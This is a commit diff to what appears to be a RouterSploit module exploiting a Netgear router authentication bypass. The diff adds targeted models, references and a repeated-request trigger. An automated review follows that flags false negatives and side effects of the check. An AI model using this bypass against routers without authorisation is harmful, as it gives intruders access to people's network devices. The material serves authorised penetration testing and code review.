Commit 5f8b0094 by Marcin Bury

Fix Neatgear auth bypass exploit.

parent 27658019
......@@ -21,10 +21,19 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt',
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'targets': [
'Netgear N300',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
print "Visit {}/BRS_netgear_success.html\n".format(url)
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
......@@ -51,6 +60,12 @@ class Exploit(exploits.Exploit):
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
for _ in range(0, 3):
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
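Review bot: Both `if response is None: return False # target is not vulnerable` branches in the last hunk treat a failed or timed-out request as a negative result, so an unreachable device looks the same as a patched one and the caller in the second hunk prints "Target seems to be not vulnerable". For anyone using this check to confirm remediation that is a false negative; at minimum the comment should read `return False  # no response: inconclusive, not evidence the target is patched`, and the failure could be reported separately (for example with `print_error`, which the module already uses) if the framework has no "unknown" result. The new `for _ in range(0, 3):` loop needs a comment saying why the page is requested three times. The docstring of what is presumably `check()` should also state that it is not a passive probe: judging by the follow-up fetch of `/`, a positive result likely leaves the device's web interface answering without credentials, which an authorized tester has to record. The enclosing method starts and ends outside the hunk and the indentation is lost in this rendering, so the final test on the second response is not visible here.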